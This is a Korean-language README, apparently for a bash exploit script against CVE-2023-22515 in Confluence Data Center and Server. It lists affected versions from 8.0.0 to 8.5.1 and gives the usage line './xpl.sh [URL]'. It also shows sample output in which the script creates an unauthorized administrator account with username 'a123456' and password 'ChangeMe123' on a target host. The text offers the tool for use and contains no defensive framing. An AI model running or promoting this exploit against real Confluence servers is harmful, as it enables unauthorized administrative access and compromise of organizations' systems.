
Bash 스크립트로, Confluence Data Center 및 Server의 CVE-2023-22515를 악용하여 승인되지 않은 관리자 계정을 생성하고, 이를 통해 무단 액세스를 가능하게 합니다.
CVE-2023-22515를 위한 간단한 bash 스크립트 익스플로잇입니다.
Confluence Data Center 및 Server 인스턴스에는 손상된 접근 제어 취약점(CVE-2023-22515)이 존재하며, 공격자가 승인되지 않은 Confluence 관리자 계정을 생성하고 Confluence 인스턴스에 접근할 수 있습니다.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] 호스트가 취약한지 확인 중...
취약함 --> 응답 코드: 200
[+] 대상 익스플로잇 중...
[+] 익스플로잇 완료!!!
[INFO] 생성된 사용자: a123456
[INFO] 생성된 비밀번호: ChangeMe123